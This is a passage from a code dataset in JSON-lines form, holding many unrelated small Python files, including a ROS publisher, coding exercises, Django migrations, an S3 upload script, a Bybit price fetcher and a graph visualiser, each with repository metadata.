trans[i][1]\n\t\t\tpose_link.position.z = trans[i][2]\n\t\t\tpose_link.orientation.x = rot[i][0]\n\t\t\tpose_link.orientation.y = rot[i][1]\n\t\t\tpose_link.orientation.z = rot[i][2]\n\t\t\tpose_link.orientation.w = rot[i][3]\n\n\t\t\tpose_linklist.poses.append(pose_link)\n\n\t\tpub.publish(pose_linklist)\n\t\trate.sleep()\n\nif __name__ == '__main__':\n\ttry:\n\t\tpublish_link()\n\texcept rospy.ROSInterruptException:\n\t\tpass","repo_name":"1Gyu1/ros-noetic","sub_path":"ros-noetic-pkgs/tf_manager/src/link_publisher.py","file_name":"link_publisher.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12511016737","text":"# BMI Calculator 2.0 - Incorporating if statements ( not that i didn't do it in the last calculator.. )\nheight = float(input(\"enter your height in m: \"))\nweight = float(input(\"enter your weight in kg: \"))\n\nbmi = weight / (height ** 2)\nrounded_bmi = round(bmi)\ntemplate = f\"Your BMI is {rounded_bmi}, you\"\n\nif bmi < 18.5:\n print(f\"{template} are underweight.\")\nelif bmi >= 18.5 and bmi < 25:\n print(f\"{template} have a normal weight.\")\nelif bmi >= 25 and bmi < 30:\n print(f\"{template} are slightly overweight.\")\nelif bmi >= 30 and bmi < 35:\n print(f\"{template} are obese.\")\nelif bmi >= 35:\n print(f\"{template} are clinically obese.\")\n","repo_name":"hristo2612/100-days-of-code-python","sub_path":"Day 3 - Control Flow & Logical Operators/3_2_BMI_Calculator.py","file_name":"3_2_BMI_Calculator.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41190728813","text":"import FWCore.ParameterSet.Config as cms\n\ncscPacker = cms.EDProducer('CSCDigiToRawModule',\n useFormatVersion = cms.uint32(2005),\n usePreTriggers = cms.bool(True),\n packEverything = cms.bool(False),\n useGEMs = cms.bool(False),\n wireDigiTag = cms.InputTag('simMuonCSCDigis', 'MuonCSCWireDigi'),\n stripDigiTag = cms.InputTag('simMuonCSCDigis', 'MuonCSCStripDigi'),\n comparatorDigiTag = cms.InputTag('simMuonCSCDigis', 'MuonCSCComparatorDigi'),\n alctDigiTag = cms.InputTag('simCscTriggerPrimitiveDigis'),\n clctDigiTag = cms.InputTag('simCscTriggerPrimitiveDigis'),\n preTriggerTag = cms.InputTag('simCscTriggerPrimitiveDigis'),\n correlatedLCTDigiTag = cms.InputTag('simCscTriggerPrimitiveDigis', 'MPCSORTED'),\n padDigiClusterTag = cms.InputTag('simMuonGEMPadDigiClusters'),\n alctWindowMin = cms.int32(-3),\n alctWindowMax = cms.int32(3),\n clctWindowMin = cms.int32(-3),\n clctWindowMax = cms.int32(3),\n preTriggerWindowMin = cms.int32(-3),\n preTriggerWindowMax = cms.int32(1),\n mightGet = cms.optional.untracked.vstring\n)\n","repo_name":"cms-sw/cmssw-cfipython","sub_path":"EventFilter/CSCRawToDigi/cscPacker_cfi.py","file_name":"cscPacker_cfi.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"22545730807","text":"\"\"\"时间串表示法\"\"\"\r\n\r\nWHSH_FUCK_TO_TIME = '%Y年%m月%d日 %H:%M:%S'\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\"\"\"初始转换时间串\"\"\" ####勿动,动者后果自负####\r\n\r\nWHSH_FUCK_TIME = '%Y-%m-%dT%H:%M:%S+0000'","repo_name":"ALiangLiang/Uto2.0","sub_path":"commands/config/TimeConfig.py","file_name":"TimeConfig.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35784568501","text":"# Given two sorted integer arrays nums1 and nums2, merge nums2 into nums1 as one\n# sorted array.\n#\n# The number of elements initialized in nums1 and nums2 are m and n respectively.\n# You may assume that nums1 has enough space (size that is equal to m + n) to\n# hold additional elements from nums2.\n#\n#\n# Example 1:\n# Input: nums1 = [1,2,3,0,0,0], m = 3, nums2 = [2,5,6], n = 3\n# Output: [1,2,2,3,5,6]\n# Example 2:\n# Input: nums1 = [1], m = 1, nums2 = [], n = 0\n# Output: [1]\n#\n#\n# Constraints:\n#\n#\n# 0 <= n, m <= 200\n# 1 <= n + m <= 200\n# nums1.length == m + n\n# nums2.length == n\n# -109 <= nums1[i], nums2[i] <= 109\n#\n# Related Topics Array Two Pointers\n# ðŸ‘� 3054 👎 4761\n\n\n# trial and error\n# for digit in nums1:\n# if digit == 0:\n# nums1.remove(digit[m])\n\n# This did not work either\n# nums1 = nums1 + nums2\n# nums1.sort()\n#\n# remove = [nums1.pop(0) for i in range(m)]\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:\n \"\"\"\n Do not return anything, modify nums1 in-place instead.\n \"\"\"\n i = 0\n for j in nums2[:n]:\n nums1[m + i] = j\n i += 1\n nums1.sort()\n\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"chrishamlin98/Algorithm-Challenges","sub_path":"Python Based/LeetCode Practice/[88]Merged Sorted Array.py","file_name":"[88]Merged Sorted Array.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25619206578","text":"# SWEA 11789\n# 0과 1로 이루어진 1차 배열에서 7개 byte(글자)를 묶어서 10진수로 출력하기\n\nT = int(input())\n\n\ndef bin_to_dec(num):\n dec_arr = []\n for i in range(0, len(num), 7):\n bin_num = num[i:i+7]\n dec_num = 0\n for j in range(7):\n if bin_num[j] == \"1\":\n dec_num += 2**(6-j)\n dec_arr.append(str(dec_num))\n return dec_arr\n\n\ndef bin_to_dec(num):\n dec_arr = []\n for i in range(0, len(num), 7):\n dec_arr.append(str(int(num[i:i+7], 2)))\n return dec_arr\n\n\ndef BtoD(byte, num):\n decimal = []\n for i in range(len(num)//byte):\n binary = num[i*byte:(i+1)*byte]\n d, b = 0, 1\n for j in range(byte-1, -1, -1): # 0010101\n d += int(binary[j])*b\n b <<= 1\n decimal.append(str(d))\n return decimal\n\n\n# def BtoD(byte, num):\n# rtn = []\n# for i in range(len(num)//byte):\n# binary = num[i*byte:(i+1)*byte][::-1] # 뒤에서 읽기 위해 [::-1]\n# D = sum(int(binary[j]) & (1 << j) for j in range(byte)) # 10진수 변환\n# rtn.append(str(D))\n# return rtn\n\n\nfor tc in range(1, T+1):\n bit_num = input()\n print(\"#%d %s\" % (tc, \", \".join(bin_to_dec(bit_num))))\n\nprint(BtoD(7, '1000101'))","repo_name":"minnczi/Algorithm","sub_path":"Swea/swea_11789.py","file_name":"swea_11789.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2902726854","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='codingninja',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('img1', models.CharField(max_length=250)),\n ('img2', models.CharField(max_length=250)),\n ('img3', models.CharField(max_length=250)),\n ('knowmore', models.CharField(max_length=1000)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='fragmentname',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('identifier', models.CharField(max_length=100, null=True)),\n ('name', models.CharField(default=b'NULL', max_length=250)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='mall',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('img1', models.CharField(default=b'NULL', max_length=250)),\n ('img2', models.CharField(default=b'NULL', max_length=250)),\n ('img3', models.CharField(default=b'NULL', max_length=250)),\n ('knowmore', models.CharField(default=b'NULL', max_length=1000)),\n ('name', models.ForeignKey(to='main.fragmentname')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='codingninja',\n name='name',\n field=models.ForeignKey(to='main.fragmentname'),\n preserve_default=True,\n ),\n ]\n","repo_name":"vishrutkohli/Info-me","sub_path":"testing/main/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"34597291398","text":"from skimage import io, transform\nfrom scipy import ndimage\nimport numpy as np\nimport os\nimport glob\n\ndef normalize(image):\n return (image - np.min(image)) / (np.max(image) - np.min(image))\n\ndef make_rgb(normalized_image):\n one_channel = (normalized_image * 255).astype(np.uint8)\n return np.stack((one_channel, one_channel, one_channel), axis=-1)\n\ndef save_interpolated_images(image_path, scale_factor):\n image = io.imread(image_path, as_gray=True)\n image = transform.resize(image, (128, 256))\n \n # Normalize the image\n image = normalize(image)\n\n # Nearest neighbor interpolation\n resized_nearest = ndimage.zoom(image, scale_factor, order=0, prefilter=False, mode='nearest')\n resized_nearest = normalize(resized_nearest)\n resized_nearest = make_rgb(resized_nearest)\n base_name = os.path.basename(image_path).split('.')[0]\n io.imsave(f\"{base_name}_expected_nearest_{scale_factor:.1f}.ppm\", resized_nearest, check_contrast=False)\n \n # Bilinear interpolation\n resized_bilinear = ndimage.zoom(image, scale_factor, order=1, prefilter=False, mode='nearest')\n resized_bilinear = normalize(resized_bilinear)\n resized_bilinear = make_rgb(resized_bilinear)\n base_name = os.path.basename(image_path).split('.')[0]\n io.imsave(f\"{base_name}_expected_bilinear_{scale_factor:.1f}.ppm\", resized_bilinear, check_contrast=False)\n \n # Bicubic interpolation\n resized_bicubic = ndimage.zoom(image, scale_factor, order=3, prefilter=False, mode='nearest')\n resized_bicubic = normalize(resized_bicubic)\n resized_bicubic = make_rgb(resized_bicubic)\n base_name = os.path.basename(image_path).split('.')[0]\n io.imsave(f\"{base_name}_expected_bicubic_{scale_factor:.1f}.ppm\", resized_bicubic, check_contrast=False)\n\nif __name__ == '__main__':\n # Get all .png files in the current directory\n png_files = glob.glob('./*.png')\n print(png_files)\n\n scale_factor = 0.5 # try 0.5 and 2.0\n for png_file in png_files:\n save_interpolated_images(png_file, scale_factor)\n","repo_name":"tonyfu97/VisualAlgo","sub_path":"datasets/ImagePreprocessingAndEnhancement/testInterpolateFig.py","file_name":"testInterpolateFig.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29887838392","text":"def binary_search (target, data):\n\n start = 0\n end = len(data) - 1\n\n while start <= end:\n mid = (start + end) // 2\n if data[mid] == target:\n return mid\n elif data[mid] < target:\n start = mid + 1\n elif data[mid] > target:\n end = mid - 1\n else:\n end = mid - 1\n return None\n\nnum1 = input()\nArray1 = map(int,input().split())\n\nnum2 = input()\nArray2 = input().split()\n\nfor i in Array2:\n target = int(i)\n if binary_search(target, Array1) is None:\n print(0)\n else:\n print(1)","repo_name":"pillow12360/Programmers_for_Coding_Test","sub_path":"dong_chan/백준/이전/0508수찾기.py","file_name":"0508수찾기.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"44447057202","text":"import pandas as pd\nimport re\n\ndfin = \"wot9.tsv\"\ndfout = \"wot10.tsv\"\n\ndef cln(w):\n w = w.strip()\n for i in \"-*?()\":\n w = w.replace(i,\"\")\n w = re.sub(\"\\{[^\\}]*?}\", \"\", w)\n w = re.sub(\"\\‘[^\\’]*?’\", \"\", w)\n w = re.sub(\"etc.\", \"\", w)\n w = re.split(\"[><←→]\", w)[0]\n\n return w.strip()\n\ndf = pd.read_csv(dfin, sep=\"\\t\")\ndf[\"donor\"] = [cln(i) for i in df[\"donor\"]]\ndf.to_csv(dfout, sep=\"\\t\", encoding=\"utf-8\", index=False)\n","repo_name":"LoanpyDataHub/ronataswestoldturkic","sub_path":"raw/misc/wrangling/clndonor.py","file_name":"clndonor.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34525761601","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING\n\nfrom discord import Message\n\nfrom hyacinth.discord.notifier_setup import NotifierSetupInteraction\nfrom hyacinth.plugin import Plugin, get_plugins\n\nif TYPE_CHECKING:\n from hyacinth.discord.discord_bot import DiscordNotifierBot\n\n\nasync def create_notifier(\n bot: DiscordNotifierBot, message: Message, plugin_name: str, params: dict[str, str] | None\n) -> None:\n plugin: Plugin | None = None\n for p in get_plugins():\n if p.command_reference_name == plugin_name:\n plugin = p\n break\n\n if plugin is None:\n await message.channel.send(\n f'Sorry {message.author.mention}, \"{plugin_name}\" is not a source I support sending'\n \" notifications for.\"\n )\n return\n\n setup_interaction = NotifierSetupInteraction(bot, message, plugin)\n\n if not params:\n await setup_interaction.begin()\n bot.active_threads[setup_interaction.thread_id] = setup_interaction\n else:\n setup_interaction.answers = params\n await setup_interaction.finish()\n await message.channel.send(\n f\"{bot.affirm()} {message.author.mention}, I've created a search for you\"\n f\" based on following parameters:\\n```{params}```\"\n )\n","repo_name":"lmesa008/bot","sub_path":"hyacinth/discord/commands/notify.py","file_name":"notify.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42851965275","text":"from django import test\n\nfrom partidillos.partidillosapp.views import main\nfrom partidillos.partidillosapp import models\n\nfrom partidillos import settings\n\n\nclass InvitePlayerTestCase(test.TestCase):\n\n #when ( request is get ) return form with fields\n def test_inviteget_noplayers(self):\n \n self.assertEqual(response.context['form']['players'].value(), None)\n self.assertEqual(response.context['form']['place'].value(), None)\n self.assertEqual(response.status_code, 200)\n\n #when ( request is post ) return form with given fields\n def testCreateMatchPost(self):\n response = self.client.post('/match/create/', \n {'dia': self.datestr, 'hora': self.timestr, 'place': self.place})\n self.assertEqual(response.status_code, 302)\n self.assertRedirects(response, '/mymatches.html')\n\n","repo_name":"txominpelu/partidillos","sub_path":"partidillos/partidillosapp/test/inviteplayers_test.py","file_name":"inviteplayers_test.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74582755074","text":"#!/usr/bin/env python3.10\n\nimport rospy\nimport time\nimport signal\nimport sys\nimport threading # Import the threading module\nfrom geometry_msgs.msg import Twist\nfrom tinymovr.tee import init_tee\nfrom tinymovr.config import create_device,get_bus_config\nimport can\nfrom std_msgs.msg import Float64\nimport matplotlib.pyplot as plt\nfrom collections import deque\nimport time\nimport glob\n\nAXLE_LENGTH = 0.76 # distance between the left and right wheels\nWHEEL_RADIUS = 0.19 # radius of each wheel\n\nclass configs:\n \n def __init__(self):\n rospy.init_node('bldc_nodee', anonymous=True)\n\n pattern = '/dev/ttyACM*'\n matching_devices = self.find_serial_devices(pattern)\n\n if matching_devices:\n # If matching devices are found, use the first one as the channel\n channel = matching_devices[0]\n else:\n # If no matching devices are found, use \"/dev/ttyACM0\" as a default\n channel = \"/dev/ttyACM0\"\n\n params = get_bus_config()\n params[\"interface\"] = \"slcan\"\n params[\"bitrate\"] = 1000000\n params[\"channel\"] = channel\n init_tee(can.Bus(**params))\n\n self.tm3 = create_device(node_id=3)\n self.tm2 = create_device(node_id=2)\n \n self.tm3.reset()\n self.tm2.reset()\n\n self.tm3.encoder.type = 1\n self.tm3.motor.pole_pairs = 4\n self.tm3.controller.velocity.p_gain = 0.007\n self.tm3.controller.velocity.i_gain = 0.001\n self.tm3.save_config()\n self.tm3.reset()\n time.sleep(3)\n\n self.tm2.encoder.type = 1\n self.tm2.motor.pole_pairs = 4\n self.tm2.controller.velocity.p_gain = 0.007\n self.tm2.controller.velocity.i_gain = 0.001\n self.tm2.save_config()\n self.tm2.reset()\n time.sleep(3)\n\n self.rate = rospy.Rate(10)\n\n # Create a lock for thread safety\n self.lock = threading.Lock()\n\n self.enc_time_buffer = deque(maxlen=100)\n self.enc_vel_estTM1_buffer = deque(maxlen=100)\n self.enc_vel_estTM2_buffer = deque(maxlen=100)\n","repo_name":"norsechurros/Motor_Control","sub_path":"src/TinyM/src/configs1.0.py","file_name":"configs1.0.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23390474321","text":"import sys\r\nimport math\r\nimport re\r\n\r\n\r\npalindromes = set()\r\ndef find_palindromes(s, i, l):\r\n\t#print('s:', s, i)\r\n\tif i >= l/2:\r\n\t\tif s[0] != '0':\r\n\t\t\tpalindromes.add(int(''.join(s)))\r\n\t\t#print('a')\r\n\t\treturn\r\n\r\n\tfor n in range(10):\r\n\t\ts[i] = s[-i-1] = str(n)\r\n\t\tfind_palindromes(s, i+1, l)\r\n\r\n\r\ndef case():\r\n\r\n\tA, B = [int(x) for x in input().split(' ')]\r\n\t\r\n\tstart = int(math.ceil(A**.5))\r\n\tend = int(B**.5)\r\n\r\n\t#print (start, end)\r\n\r\n\tcount = 0\r\n\tfor i in palindromes:\r\n\t\tif i > end:\r\n\t\t\tbreak\r\n\r\n\t\tif i >= start and i*i in palindromes:\r\n\t\t\t#print (i, ',', i*i)\r\n\t\t\tcount += 1\r\n\r\n\r\n\tsys.stdout.write(str(count))\r\n\r\n\r\n\r\n\r\nif __name__==\"__main__\":\r\n\r\n\ts = []\r\n\tfor i in range(3):\r\n\t\ts.append('0')\r\n\t\tfind_palindromes(s, 0, len(s));\r\n\tpalindromes = sorted(palindromes)\r\n\t#print(palindromes)\r\n\r\n\tif len(sys.argv) > 1:\r\n\t\tsys.stdin = open(sys.argv[1])\r\n\r\n\tnum_cases = int(input())\r\n\r\n\tfor c in range (1, num_cases+1):\r\n\t\tsys.stdout.write('Case #')\r\n\t\tsys.stdout.write(str(c))\r\n\t\tsys.stdout.write(': ')\r\n\t\tcase()\r\n\t\tsys.stdout.write('\\n')\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_118/1017.py","file_name":"1017.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74286107073","text":"import requests\nbody = {\n \n \"open_price\": 1007700,\n \"close_price\": 1077500,\n \"volume\": 10884400\n }\nresponse = requests.post(url = 'https://bitcoin-price-service-jesussaith.cloud.okteto.net/predict_price',\n json = body)\nprint (response.json())\n# output: {'score': 0.866490130600765}\n","repo_name":"JesusSaith/Bitcoin-Price","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33889062685","text":"# 분해합\n\nN = int(input())\nn = N - (9 * 6)\nans = 0\n\nfor i in range(n, N):\n a = i\n j = i\n while(j > 0):\n a += j % 10\n j = int(j/10)\n if a == N:\n ans = i\n break\n else:\n continue\nprint(ans)\n","repo_name":"dyeong-00/Language_study","sub_path":"BaekJoon/2231.py","file_name":"2231.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29903435075","text":"import networkx as nx\nimport matplotlib.pyplot as plt\n\nwith open('./graph.txt') as f:\n lines = f.read().splitlines()\n g = nx.Graph()\n\n for line in lines:\n splitted_line = list(map(lambda x: x.strip(), line.split(' ')))\n data = dict()\n\n for arg in splitted_line:\n arg = arg.split('=')\n data[arg[0]] = arg[1]\n\n if 'flot=' in line:\n parent_label = data['ID'].split(':')[0]\n child_label = data['ID'].split(':')[1]\n\n edge_color = 'black'\n show_edge = True\n\n if parent_label == 'source':\n edge_color = 'blue'\n #show_edge = False\n\n if child_label == 'puits':\n edge_color = 'red'\n #show_edge = False\n\n if show_edge:\n g.add_edge(parent_label, child_label, length=100,\n capacity=int(data['capacite']), color=edge_color, label=f'{data[\"flot\"]}/{data[\"capacite\"]}')\n\n else:\n if data['ID'].split('-')[0] != 'source' and data['ID'].split('-')[0] != 'puits':\n x = int(data['ID'].split('-')[0]) * 10 * 10\n y = int(data['ID'].split('-')[1]) * -10 * 10\n\n elif data['ID'].split('-')[0] == 'source':\n x = -200\n y = -150\n\n elif data['ID'].split('-')[0] == 'puits':\n x = 150\n y = 200\n\n label = f'{data[\"ID\"]}' # - a={data[\"a\"]} b={data[\"b\"]}\n g.add_node(label, pos=(x, y))\n\n plt.figure(figsize=(24, 24))\n\n ax = plt.gca()\n ax.set_title('Titre')\n\n edges = g.edges()\n colors = [g[u][v]['color'] for u, v in edges]\n weights = [2 for u, v in edges]\n\n positions = nx.get_node_attributes(g, 'pos')\n nx.draw(g, positions, edge_color=colors,\n width=weights, with_labels=True, ax=ax)\n\n labels = nx.get_edge_attributes(g, 'label')\n\n nx.draw_networkx_edge_labels(\n g, positions, edge_labels=labels, label_pos=0.5, ax=ax)\n\n _ = ax.axis('off')\n plt.savefig(f'./graph.png')\n plt.show()\n","repo_name":"TristanFaine/Graphes2M1","sub_path":"graph_visualizer.py","file_name":"graph_visualizer.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27528737916","text":"import json\nimport csv\nfrom opencc import OpenCC\n\n\nclass DataHelper:\n def makeCSV(self):\n file = open('data_train.json',encoding='utf-8')\n facts = []\n accusations = []\n\n theft = 0\n harm = 0\n fraud = 0\n\n cc = OpenCC('s2t')\n for data in file:\n data = json.loads(data)\n\n fact = data['fact']\n crime = data['meta']['accusation'][0]\n\n if crime == '盗窃' or crime == '故意伤害' or crime == '诈骗':\n if crime == '盗窃' and theft < 1000:\n theft += 1\n facts.append(cc.convert(fact))\n accusations.append(cc.convert(crime))\n elif crime == '故意伤害' and harm < 1000:\n harm += 1\n facts.append(cc.convert(fact))\n accusations.append(cc.convert(crime))\n elif crime == '诈骗' and fraud < 1000:\n fraud += 1\n facts.append(cc.convert(fact))\n accusations.append(cc.convert(crime))\n\n with open('crime.csv', 'w', newline='',encoding='utf-8') as csvfile:\n fieldnames = ['Fact', 'accusation']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n for i in range(len(accusations)):\n writer.writerow({'Fact' : facts[i],'accusation' : accusations[i]})\n\n\n def get_data(self):\n csvfile = open('crime.csv',newline='',encoding='utf-8')\n reader = csv.DictReader(csvfile)\n facts = []\n accusations = []\n for row in reader:\n facts.append(row['Fact'])\n accusations.append(row['accusation'])\n return facts,accusations\n","repo_name":"pohjohn0928/crime_model","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31735308811","text":"from nltk.tokenize import word_tokenize, sent_tokenize\nline = \"Hello! 'Welcome to text pre-processing session.' Do you know python? Mr. XXX is the tutor for this session.\"\ntokens = word_tokenize(line)\nprint(tokens)\n\nsentences = sent_tokenize(line)\nprint(sentences)\n\n\n\n\n##import nltk\n##tokenizer = nltk.data.load('tokennizers/punkt/english.pickle')\n##line = \"Hello! Welcome to text pre-processing session. Do you know python? Mr. XXX is the tutor for tis session\"\n##print(tokenizer.tokenize(line))\n","repo_name":"saran-sankar/Jarvis","sub_path":"Program_Files/nlp/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"40049907812","text":"import boto3\nimport os\nimport sys\n\n#s3 = boto3.client(\n# 's3',\n# aws_access_key_id='###AWS_ACCESS_KEY###',\n# aws_secret_access_key='###AWS_SECRET_KEY###'\n#)\n\n\ns3 = boto3.client('s3')\nsearchpath=sys.argv[1]\n#print(sys.argv[1])\n\nfor root,d_names,f_names in os.walk(searchpath):\n for f in f_names:\n folder=os.path.realpath(root).split('/')\n s3path=folder[len(folder)-2] + '/' + folder[len(folder)-1] + '/' + f\n #s3.upload_file('windows.version', 'hiaas-vmimage-dev', 'windows.version')\n print(s3path)\n file=root + '/' + f\n s3.upload_file(file, 'hiaas-vmimage-dev', s3path)\n #print(file)\n #print(f)\n","repo_name":"oizone/vm-imager-win","sub_path":"uploads3.py","file_name":"uploads3.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42663807779","text":"from manim import *\nfrom typing import Tuple\n\n\nclass Equations(MathTex):\n\n def __init__(self, *equations: str, **kwargs):\n MathTex.__init__(self, *equations, **kwargs)\n self.__equationIndices = []\n\n for i in range(len(equations)):\n equation = MathTex(equations[i], **kwargs)\n\n start = 0 if i == 0 else self.__equationIndices[i - 1][1]\n stop = start + len(equation)\n \n self.__equationIndices.append((start, stop))\n\n #self.__mathTexEquations = MathTex(*equations, **kwargs)\n\n def getEquationIndices(self, index: int or slice) -> Tuple[int, int]:\n if isinstance(index, slice):\n indices = self.__equationIndices[index]\n start = indices[0][0]\n stop = indices[len(indices) - 1][1]\n return start, stop\n else:\n return self.__equationIndices[index]\n\n def __getitem__(self, index: int or slice) -> VGroup:\n indices = self.getEquationIndices(index)\n return MathTex.__getitem__(self, slice(indices[0], indices[1]))\n\n","repo_name":"pumbas600/ENGGEN121GroupAssignment2","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73968073474","text":"import random\nkeep_going =True\n# while keep_going: \ndice = [0, 0, 0, 0, 0,0, 0,]\nfor i in range(6):\n dice[i]= random.randint(1,6)\nprint(dice)\ndice.sort()\nprint(dice)\n\nif dice[0] == dice[0]:\n print(\"ЯЦЗЫ!\")\nelse:\n print(\"OTHER\")","repo_name":"zhanibekov/python-learning","sub_path":"chapter6/dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9673809113","text":"n = int(input())\na = []\nb = []\n\nfor i in range(n):\n x, y = map(int, input().split())\n a.append(x)\n b.append(y)\n\nra = {}\nrb = {}\n\nfor i, j in zip(sorted(a), sorted(b)):\n ra[i] = len(ra) + 1\n rb[j] = len(rb) + 1\n\nd_sum = 0\n\nfor i, j in zip(a, b):\n d_sum += (ra[i] - rb[j])**2\n\nprint(1 - 6 * d_sum / (n**3 - n))\n","repo_name":"letstatt/itmo","sub_path":"machine-learning/codeforces/e/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"11359320207","text":"from pybit.unified_trading import HTTP\nfrom datetime import datetime as dt\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nAPI_KEY = os.getenv('API_KEY')\nAPI_SECRET = os.getenv('API_SECRET')\n\n\nclass ByBitKline:\n\n def __init__(self):\n self.response = self.get_kline()\n self.object = self.create_kline_object()\n\n def get_kline(self):\n session = HTTP(testnet=False, api_key=API_KEY, api_secret=API_SECRET,)\n response = session.get_kline(\n category=\"linear\",\n symbol=\"BTCUSD\",\n interval=60,\n start=1670601600000,\n end=1670608800000,\n )\n return response\n\n def create_kline_object(self):\n lists = {\n \"List1\": self.response[\"result\"][\"list\"][0],\n \"List2\": self.response[\"result\"][\"list\"][1],\n \"List3\": self.response[\"result\"][\"list\"][2],\n }\n obj = {\n \"Return Message\": self.response[\"retMsg\"],\n \"Category\": self.response[\"result\"][\"category\"],\n \"Symbol\": self.response[\"result\"][\"symbol\"],\n \"Time\": dt.fromtimestamp(int(self.response[\"time\"]) / 1000.0).isoformat(' '),\n }\n for key, value in lists.items():\n dct = {\n f\"{key} Start time of the candle\": dt.fromtimestamp(int(value[0]) / 1000.0).isoformat(' '),\n f\"{key} Open price\": value[1],\n f\"{key} Highest price\": value[2],\n f\"{key} Lowest price\": value[3],\n f\"{key} Close price\": value[4],\n f\"{key} Trade Volume\": value[5],\n f\"{key} Turnover\": value[6],\n }\n obj.update(dct)\n return obj\n\n def write_kline_to_file(self):\n with open(\"kline.txt\", 'w') as f:\n for key, value in self.object.items():\n f.write(f\"{key} : {value}\\n\")\n\n def print_kline_from_file(self):\n with open('kline.txt', 'r') as f:\n for line in f:\n print(line.strip())\n return None\n\n","repo_name":"giedriusstankauskas/by_bit","sub_path":"kline.py","file_name":"kline.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13263490373","text":"#Basic Data Types Challenge 1: Letter Counter App\n\nprint(\"Welcome to the Letter Counter App\")\n\n#Get user input.\nname = input(\"\\nWhat is your name: \").title().strip()\nprint(\"Hello, \" + name + \"!\")\n\nprint(\"I will count the number of times that a specific letter occurs in a message.\")\nmessage = input(\"\\nPlease enter a message: \")\nletter = input(\"Which letter would you like to count the occurrences of: \")\n\n#Standardize to lower case.\nmessage = message.lower()\nletter = letter.lower()\n\n#Get the count and display results.\nletter_count = 